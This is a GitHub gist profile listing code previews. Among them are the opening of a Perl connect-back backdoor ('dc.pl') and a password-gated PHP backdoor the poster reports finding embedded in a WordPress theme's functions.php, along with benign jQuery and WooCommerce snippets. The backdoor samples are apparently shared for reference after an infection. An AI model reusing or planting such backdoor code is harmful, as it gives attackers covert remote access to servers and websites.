Skip to content

Instantly share code, notes, and snippets.

View islanddog's full-sized avatar
💭
Wisdom is not a product of schooling but of the lifelong attempt to acquire it.

Christopher Soehnlein islanddog

💭
Wisdom is not a product of schooling but of the lifelong attempt to acquire it.
View GitHub Profile
@islanddog
islanddog / linkk.php
Created February 24, 2017 16:04
linkk.php - Sindbad~EG File Manager - Virus
linkk.php
@islanddog
islanddog / dc.pl
Created February 24, 2017 15:53
dc.pl - Backdoor Exploit
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
@islanddog
islanddog / HTTP500error.PHP
Created January 6, 2017 16:47
Embeddded above my Functions.PHP in my Theme Directory
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b6ea9d6122a7b904c78705dfb28cde40'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
@islanddog
islanddog / hsd.js
Created October 18, 2016 13:47
SproutApps - HelpScout Desk
jQuery.noConflict();
jQuery(function($) {
$(window).load(function(){
});
$(document).ready(function($){
var $shortcode_html = $("#hsd_conversations_table");
@islanddog
islanddog / add-to-cart.php
Last active August 22, 2016 20:35 — forked from claudiosanches/add-to-cart.php
WooCommerce 2.6.4 - Working Quantity on Simple Products - HOT
<?php
/**
* Custom Loop Add to Cart.
*
* Template with quantity and ajax.
*/
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly.
global $product;